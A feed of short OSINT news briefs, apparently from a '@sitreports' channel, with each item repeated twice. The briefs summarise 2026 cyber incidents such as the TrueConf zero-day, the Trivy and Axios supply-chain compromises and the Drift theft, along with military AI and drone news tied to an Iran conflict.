🔍 TrueConf Zero-Day Hits Southeast Asia
A zero-day vulnerability in TrueConf, tracked as CVE-2026-3502 with a CVSS score of 7.8, has been exploited in targeted attacks against government entities across Southeast Asia. The campaign has been designated Operation TrueChaos by researchers tracking the activity.
The exploitation of video conferencing infrastructure against government targets follows a documented pattern of threat actors prioritizing communication platforms as initial access vectors. A CVSS score of 7.8 indicates high-severity local or network exploitability, consistent with post-authentication or adjacent-network attack chains typically used in targeted intrusion operations.
🛰️ Open sources - closed narratives
@sitreports
A zero-day vulnerability in TrueConf, tracked as CVE-2026-3502 with a CVSS score of 7.8, has been exploited in targeted attacks against government entities across Southeast Asia. The campaign has been designated Operation TrueChaos by researchers tracking the activity.
The exploitation of video conferencing infrastructure against government targets follows a documented pattern of threat actors prioritizing communication platforms as initial access vectors. A CVSS score of 7.8 indicates high-severity local or network exploitability, consistent with post-authentication or adjacent-network attack chains typically used in targeted intrusion operations.
🛰️ Open sources - closed narratives
@sitreports
🔍 Claude Code Source Exposes Data Collection
A source code leak of Anthropic's Claude Code tool has revealed the scope of system and user data the application collects during operation, according to The Register's analysis. The exposed code details telemetry collection covering local system environment, file paths, and session activity transmitted to Anthropic's infrastructure.
The disclosure fits a pattern of AI developer tooling accumulating substantially broader telemetry than disclosed in user-facing documentation. CLI-based coding assistants operate with elevated local permissions by design, creating a collection surface that extends beyond the interaction log into the host system environment.
🛰️ Open sources - closed narratives
@sitreports
A source code leak of Anthropic's Claude Code tool has revealed the scope of system and user data the application collects during operation, according to The Register's analysis. The exposed code details telemetry collection covering local system environment, file paths, and session activity transmitted to Anthropic's infrastructure.
The disclosure fits a pattern of AI developer tooling accumulating substantially broader telemetry than disclosed in user-facing documentation. CLI-based coding assistants operate with elevated local permissions by design, creating a collection surface that extends beyond the interaction log into the host system environment.
🛰️ Open sources - closed narratives
@sitreports
🔍 Iran Sprays M365, Targets Missile Strike Cities
Iranian threat actors have conducted password-spraying campaigns against Microsoft 365 accounts, with researchers identifying a pattern in the target selection: affected accounts correlate geographically with cities previously hit by Iranian missile strikes.
The overlap between kinetic strike locations and credential-access targets indicates a coordinated intelligence-collection effort running parallel to, or following, physical strike operations. Password spraying against M365 — using low-volume attempts across many accounts to avoid lockout — is a low-cost, low-signature method suited for sustained access rather than one-time exploitation.
The pattern fits established doctrine of pairing kinetic operations with follow-on signals collection against surviving infrastructure and personnel in the same geographic zones.
🛰️ Open sources - closed narratives
@sitreports
Iranian threat actors have conducted password-spraying campaigns against Microsoft 365 accounts, with researchers identifying a pattern in the target selection: affected accounts correlate geographically with cities previously hit by Iranian missile strikes.
The overlap between kinetic strike locations and credential-access targets indicates a coordinated intelligence-collection effort running parallel to, or following, physical strike operations. Password spraying against M365 — using low-volume attempts across many accounts to avoid lockout — is a low-cost, low-signature method suited for sustained access rather than one-time exploitation.
The pattern fits established doctrine of pairing kinetic operations with follow-on signals collection against surviving infrastructure and personnel in the same geographic zones.
🛰️ Open sources - closed narratives
@sitreports
💻 Cisco Source Code Stolen via Trivy
A threat actor used credentials obtained through the Trivy supply chain compromise to access Cisco's internal development environment, exfiltrating source code belonging to Cisco and an undisclosed number of its customers.
The incident illustrates how supply chain breaches function as credential harvesting operations with delayed downstream impact. A single compromise in a shared developer toolchain — in this case Trivy, a widely used vulnerability scanner — yields access to multiple organizations through legitimate-appearing authentication.
For Cisco customers whose proprietary code was stored in the affected environment, the exposure extends beyond the vendor relationship into potential intellectual property and vulnerability disclosure risk.
🛰️ Open sources - closed narratives
@sitreports
A threat actor used credentials obtained through the Trivy supply chain compromise to access Cisco's internal development environment, exfiltrating source code belonging to Cisco and an undisclosed number of its customers.
The incident illustrates how supply chain breaches function as credential harvesting operations with delayed downstream impact. A single compromise in a shared developer toolchain — in this case Trivy, a widely used vulnerability scanner — yields access to multiple organizations through legitimate-appearing authentication.
For Cisco customers whose proprietary code was stored in the affected environment, the exposure extends beyond the vendor relationship into potential intellectual property and vulnerability disclosure risk.
🛰️ Open sources - closed narratives
@sitreports
🔍 Pentagon Advances Drone Swarm Program
The U.S. Department of Defense is preparing a drone swarm testing initiative designated Swarm Forge, classified as one of several pace-setting projects directed by Defense Secretary Pete Hegseth in a departmental memo on AI integration.
The initiative fits a broader DoD pattern of accelerating autonomous systems development under direct secretarial mandate, placing swarm coordination alongside other AI-priority programs at the institutional level. Designating such projects as pace-setters signals resource prioritization and reduced bureaucratic friction in acquisition and testing cycles.
🛰️ Open sources - closed narratives
@sitreports
The U.S. Department of Defense is preparing a drone swarm testing initiative designated Swarm Forge, classified as one of several pace-setting projects directed by Defense Secretary Pete Hegseth in a departmental memo on AI integration.
The initiative fits a broader DoD pattern of accelerating autonomous systems development under direct secretarial mandate, placing swarm coordination alongside other AI-priority programs at the institutional level. Designating such projects as pace-setters signals resource prioritization and reduced bureaucratic friction in acquisition and testing cycles.
🛰️ Open sources - closed narratives
@sitreports
🔍 Pentagon Deploys Bunkers, Tech for Iran
As of March 31, U.S. Central Command has recorded at least 348 U.S. military personnel wounded in the ongoing Iran war. The casualty figures accompany Pentagon moves to expand hardened shelter capacity and additional force protection technologies under Operation Epic Fury.
The push toward increased bunker infrastructure signals a sustained threat environment requiring passive defense solutions alongside active measures. Prioritizing physical hardening reflects an operational assessment that personnel exposure to indirect fire or aerial attack remains a persistent variable in the theater.
🛰 Open sources - closed narratives
@sitreports
As of March 31, U.S. Central Command has recorded at least 348 U.S. military personnel wounded in the ongoing Iran war. The casualty figures accompany Pentagon moves to expand hardened shelter capacity and additional force protection technologies under Operation Epic Fury.
The push toward increased bunker infrastructure signals a sustained threat environment requiring passive defense solutions alongside active measures. Prioritizing physical hardening reflects an operational assessment that personnel exposure to indirect fire or aerial attack remains a persistent variable in the theater.
🛰 Open sources - closed narratives
@sitreports
🔍 TSMC Japan 3nm Production 2028
TSMC's second factory in Japan is scheduled to begin equipment installation and mass production of 3-nanometre wafers in 2028, according to a Taiwanese government filing. The facility marks TSMC's continued geographic expansion of advanced-node manufacturing beyond Taiwan.
The 3nm node is currently among the most capable process technologies in volume production. Establishing this capacity in Japan shifts a portion of leading-edge semiconductor output into a second jurisdiction, reducing single-point geographic concentration in TSMC's production network.
🛰️ Open sources - closed narratives
@sitreports
TSMC's second factory in Japan is scheduled to begin equipment installation and mass production of 3-nanometre wafers in 2028, according to a Taiwanese government filing. The facility marks TSMC's continued geographic expansion of advanced-node manufacturing beyond Taiwan.
The 3nm node is currently among the most capable process technologies in volume production. Establishing this capacity in Japan shifts a portion of leading-edge semiconductor output into a second jurisdiction, reducing single-point geographic concentration in TSMC's production network.
🛰️ Open sources - closed narratives
@sitreports
☁️ Iran Strike Hits AWS Bahrain
An Iranian strike damaged Amazon's cloud computing infrastructure in Bahrain, according to a Reuters report citing the Financial Times.
The incident marks a direct physical impact on commercial cloud infrastructure from state military action. AWS's Bahrain region serves as a primary node for Gulf-area enterprise and government workloads, making its degradation operationally significant beyond Amazon's commercial exposure.
The targeting — whether deliberate or incidental — establishes a data point on the physical vulnerability of hyperscaler infrastructure to conventional strike activity in contested regions.
🛰️ Open sources - closed narratives
@sitreports
An Iranian strike damaged Amazon's cloud computing infrastructure in Bahrain, according to a Reuters report citing the Financial Times.
The incident marks a direct physical impact on commercial cloud infrastructure from state military action. AWS's Bahrain region serves as a primary node for Gulf-area enterprise and government workloads, making its degradation operationally significant beyond Amazon's commercial exposure.
The targeting — whether deliberate or incidental — establishes a data point on the physical vulnerability of hyperscaler infrastructure to conventional strike activity in contested regions.
🛰️ Open sources - closed narratives
@sitreports
🤖 Army Tests AI Strike Drone
The 101st Airborne Division integrated Northrop Grumman's Lumberjack one-way attack drone into a recent training exercise, pairing the system with the Army's Maven Smart System for AI-enabled targeting trials.
The Lumberjack is a loitering munition designed for single-use strike missions. Its integration with Maven — the Army's primary AI targeting platform — indicates a structural push toward machine-assisted engagement decisions at the division level, embedding autonomous strike capacity into conventional airborne formations.
🛰️ Open sources - closed narratives
@sitreports
The 101st Airborne Division integrated Northrop Grumman's Lumberjack one-way attack drone into a recent training exercise, pairing the system with the Army's Maven Smart System for AI-enabled targeting trials.
The Lumberjack is a loitering munition designed for single-use strike missions. Its integration with Maven — the Army's primary AI targeting platform — indicates a structural push toward machine-assisted engagement decisions at the division level, embedding autonomous strike capacity into conventional airborne formations.
🛰️ Open sources - closed narratives
@sitreports
🔍 Handala Claims Israeli Defense Contractor Breach
Iranian hacker group Handala claims to have breached PSK Wind Technologies, a contractor responsible for designing and operating Israeli military command centers and air defense communication systems. The reported breach has not been independently confirmed.
The targeting of a third-party vendor embedded in the IDF supply chain follows an established pattern of perimeter bypass through contractor access. Direct military networks carry hardened defenses; vendors integrated into those networks frequently do not. Handala has previously used this method to reach assets that would otherwise require penetrating military-grade infrastructure.
🛰️ Open sources - closed narratives
@sitreports
Iranian hacker group Handala claims to have breached PSK Wind Technologies, a contractor responsible for designing and operating Israeli military command centers and air defense communication systems. The reported breach has not been independently confirmed.
The targeting of a third-party vendor embedded in the IDF supply chain follows an established pattern of perimeter bypass through contractor access. Direct military networks carry hardened defenses; vendors integrated into those networks frequently do not. Handala has previously used this method to reach assets that would otherwise require penetrating military-grade infrastructure.
🛰️ Open sources - closed narratives
@sitreports
🔍 UAE Iran Strike Narratives Diverge
A Bellingcat open-source review finds that UAE official statements on Iranian drone and missile strikes do not consistently match physical evidence and imagery available through open-source channels. Discrepancies center on strike outcomes — whether intercepted or successful — and the extent of documented damage.
The pattern fits an established information management model in which regional governments control damage acknowledgment to limit political exposure and maintain deterrence posture. Selective disclosure of intercept claims, without corroborating debris or impact data, functions as a structural feature of official battlefield communication rather than an exception.
A Bellingcat open-source review finds that UAE official statements on Iranian drone and missile strikes do not consistently match physical evidence and imagery available through open-source channels. Discrepancies center on strike outcomes — whether intercepted or successful — and the extent of documented damage.
The pattern fits an established information management model in which regional governments control damage acknowledgment to limit political exposure and maintain deterrence posture. Selective disclosure of intercept claims, without corroborating debris or impact data, functions as a structural feature of official battlefield communication rather than an exception.
📡 Navy Seeks RF Emulation for Drones
The U.S. Navy is pursuing technology capable of producing and managing realistic radio frequency signals on unmanned platforms, with application directed at Pacific Fleet operations. The program targets signal emulation on maritime drones to generate training environments that reflect operational electromagnetic conditions.
The requirement reflects a structural shift in how naval forces approach RF signal training — moving emulation capability onto unmanned systems rather than relying on dedicated shore or vessel-based range infrastructure. This reduces dependency on fixed facilities and embeds signal management directly into deployable drone platforms.
🛰️ Open sources - closed narratives
@sitreports
The U.S. Navy is pursuing technology capable of producing and managing realistic radio frequency signals on unmanned platforms, with application directed at Pacific Fleet operations. The program targets signal emulation on maritime drones to generate training environments that reflect operational electromagnetic conditions.
The requirement reflects a structural shift in how naval forces approach RF signal training — moving emulation capability onto unmanned systems rather than relying on dedicated shore or vessel-based range infrastructure. This reduces dependency on fixed facilities and embeds signal management directly into deployable drone platforms.
🛰️ Open sources - closed narratives
@sitreports
🔍 EU Commission Breach Hits 30 Entities
CERT-EU has attributed a cloud breach of the European Commission to the TeamPCP threat group. The intrusion exposed data belonging to at least 29 additional EU entities beyond the Commission itself.
The incident follows a pattern of adversaries targeting shared cloud infrastructure to achieve lateral data exposure across multiple institutional victims from a single point of compromise. Attribution to a named threat group indicates CERT-EU has sufficient technical indicators to move beyond preliminary assessment.
🛰️ Open sources - closed narratives
@sitreports
CERT-EU has attributed a cloud breach of the European Commission to the TeamPCP threat group. The intrusion exposed data belonging to at least 29 additional EU entities beyond the Commission itself.
The incident follows a pattern of adversaries targeting shared cloud infrastructure to achieve lateral data exposure across multiple institutional victims from a single point of compromise. Attribution to a named threat group indicates CERT-EU has sufficient technical indicators to move beyond preliminary assessment.
🛰️ Open sources - closed narratives
@sitreports
🔍 Drift Loses $285M, DPRK Linked
On April 1, 2026, decentralized finance platform Drift lost $285 million after attackers used a nonce-based social engineering attack to achieve administrative takeover of the protocol. The vector exploited nonce manipulation to authenticate fraudulent transactions, bypassing standard authorization controls.
The operation fits an established pattern attributed to DPRK-linked threat actors targeting cryptocurrency infrastructure. North Korean units have systematically combined technical exploit development with human-layer manipulation to extract funds from DeFi protocols, with proceeds assessed as financing state programs.
🛰️ Open sources - closed narratives
@sitreports
On April 1, 2026, decentralized finance platform Drift lost $285 million after attackers used a nonce-based social engineering attack to achieve administrative takeover of the protocol. The vector exploited nonce manipulation to authenticate fraudulent transactions, bypassing standard authorization controls.
The operation fits an established pattern attributed to DPRK-linked threat actors targeting cryptocurrency infrastructure. North Korean units have systematically combined technical exploit development with human-layer manipulation to extract funds from DeFi protocols, with proceeds assessed as financing state programs.
🛰️ Open sources - closed narratives
@sitreports
🔍 GitHub Used As North Korea C2
A phishing campaign linked to North Korean operators is targeting South Korean organizations using GitHub as a C2 infrastructure channel. Initial access is delivered via LNK files — Windows shortcut attachments that execute payloads upon interaction.
Routing command-and-control traffic through GitHub allows operators to blend malicious communications with legitimate platform activity, complicating network-level detection. The technique reduces the operational signature of the campaign by avoiding dedicated attacker-controlled domains.
🛰️ Open sources - closed narratives
@sitreports
A phishing campaign linked to North Korean operators is targeting South Korean organizations using GitHub as a C2 infrastructure channel. Initial access is delivered via LNK files — Windows shortcut attachments that execute payloads upon interaction.
Routing command-and-control traffic through GitHub allows operators to blend malicious communications with legitimate platform activity, complicating network-level detection. The technique reduces the operational signature of the campaign by avoiding dedicated attacker-controlled domains.
🛰️ Open sources - closed narratives
@sitreports
🔍 CERT-UA Identity Spoofed, RAT Deployed
Between March 26 and 27, 2025, the Computer Emergency Response Team of Ukraine disrupted a campaign in which threat actors impersonated CERT-UA itself to deliver a Go-based remote access trojan to targets in Ukraine.
Spoofing a national cybersecurity authority to distribute malware inverts the trust model those institutions depend on for incident response coordination. Targets conditioned to act on CERT-UA communications become the attack surface.
🛰️ Open sources - closed narratives
@sitreports
Between March 26 and 27, 2025, the Computer Emergency Response Team of Ukraine disrupted a campaign in which threat actors impersonated CERT-UA itself to deliver a Go-based remote access trojan to targets in Ukraine.
Spoofing a national cybersecurity authority to distribute malware inverts the trust model those institutions depend on for incident response coordination. Targets conditioned to act on CERT-UA communications become the attack surface.
🛰️ Open sources - closed narratives
@sitreports
📡 Kremlin Pushes State Messenger Adoption
The Kremlin is actively promoting MAX, a state-backed messaging application, as a preferred communications platform for Russian users. According to Reuters reporting, a segment of the population is declining to install the service.
State-promoted messaging infrastructure follows an established pattern in centralized communications strategy: routing civilian traffic through domestically controlled platforms enables metadata retention and content access under national law. Resistance from users indicates the substitution effort has not achieved passive adoption — a marker of incomplete normalization.
🛰️ Open sources - closed narratives
@sitreports
The Kremlin is actively promoting MAX, a state-backed messaging application, as a preferred communications platform for Russian users. According to Reuters reporting, a segment of the population is declining to install the service.
State-promoted messaging infrastructure follows an established pattern in centralized communications strategy: routing civilian traffic through domestically controlled platforms enables metadata retention and content access under national law. Resistance from users indicates the substitution effort has not achieved passive adoption — a marker of incomplete normalization.
🛰️ Open sources - closed narratives
@sitreports
🔍 Fortinet Patches FortiClient EMS Flaw
Fortinet has released a patch for CVE-2026-35616, a privilege escalation vulnerability scoring 9.1 on the CVSS scale, affecting FortiClient EMS versions 7.4.5 through 7.4.6. Active exploitation has been recorded since March 31, 2026.
The vulnerability allows local or remote attackers to escalate privileges within affected EMS deployments. FortiClient EMS is commonly used in enterprise environments for endpoint management, making privilege escalation flaws in this component operationally significant for lateral movement scenarios.
🛰️ Open sources - closed narratives
@sitreports
Fortinet has released a patch for CVE-2026-35616, a privilege escalation vulnerability scoring 9.1 on the CVSS scale, affecting FortiClient EMS versions 7.4.5 through 7.4.6. Active exploitation has been recorded since March 31, 2026.
The vulnerability allows local or remote attackers to escalate privileges within affected EMS deployments. FortiClient EMS is commonly used in enterprise environments for endpoint management, making privilege escalation flaws in this component operationally significant for lateral movement scenarios.
🛰️ Open sources - closed narratives
@sitreports
🔍 Axios npm Compromised via Social Engineering
A maintainer of the Axios HTTP client library — one of the most widely used npm packages — was targeted through a social engineering operation attributed to North Korean threat actors. The attack used a fabricated Microsoft Teams error fix as a pretext to gain access to the maintainer's account, as detailed in a post-mortem published by the Axios team.
The method follows an established pattern in DPRK-linked intrusion sets: targeting individual developers with elevated repository access rather than attacking package infrastructure directly. Compromising a maintainer account provides write access to published packages, enabling downstream supply chain manipulation at scale across dependent projects.
🛰️ Open sources - closed narratives
@sitreports
A maintainer of the Axios HTTP client library — one of the most widely used npm packages — was targeted through a social engineering operation attributed to North Korean threat actors. The attack used a fabricated Microsoft Teams error fix as a pretext to gain access to the maintainer's account, as detailed in a post-mortem published by the Axios team.
The method follows an established pattern in DPRK-linked intrusion sets: targeting individual developers with elevated repository access rather than attacking package infrastructure directly. Compromising a maintainer account provides write access to published packages, enabling downstream supply chain manipulation at scale across dependent projects.
🛰️ Open sources - closed narratives
@sitreports
🔍 150 Aircraft Deployed Over Iran
The U.S. military deployed over 150 aircraft to recover a downed aviator in Iran, according to Gen. Dan Caine. The recovery operation included tactical drones, strike aircraft, and additional assets providing overhead protection for search-and-rescue personnel on the ground.
The scale of the deployment reflects standard force-protection doctrine applied to personnel recovery in denied or contested territory — layered air cover to suppress interdiction of ground teams. Committing that volume of assets indicates the operation was conducted under conditions of active or anticipated threat, not permissive airspace.
🛰️ Open sources - closed narratives
@sitreports
The U.S. military deployed over 150 aircraft to recover a downed aviator in Iran, according to Gen. Dan Caine. The recovery operation included tactical drones, strike aircraft, and additional assets providing overhead protection for search-and-rescue personnel on the ground.
The scale of the deployment reflects standard force-protection doctrine applied to personnel recovery in denied or contested territory — layered air cover to suppress interdiction of ground teams. Committing that volume of assets indicates the operation was conducted under conditions of active or anticipated threat, not permissive airspace.
🛰️ Open sources - closed narratives
@sitreports
✈️ Air Force Requests $1B CCA Drones
The U.S. Air Force has submitted a request for nearly $1 billion in fiscal year 2027 to begin CCA procurement, marking the transition of the Collaborative Combat Aircraft program from development into initial acquisition.
The CCA program is designed to field autonomous drone wingmen capable of operating alongside crewed fighter aircraft. A dedicated FY2027 budget line indicates the Air Force is moving toward operational inventory rather than continued prototype evaluation.
🛰️ Open sources - closed narratives
@sitreports
The U.S. Air Force has submitted a request for nearly $1 billion in fiscal year 2027 to begin CCA procurement, marking the transition of the Collaborative Combat Aircraft program from development into initial acquisition.
The CCA program is designed to field autonomous drone wingmen capable of operating alongside crewed fighter aircraft. A dedicated FY2027 budget line indicates the Air Force is moving toward operational inventory rather than continued prototype evaluation.
🛰️ Open sources - closed narratives
@sitreports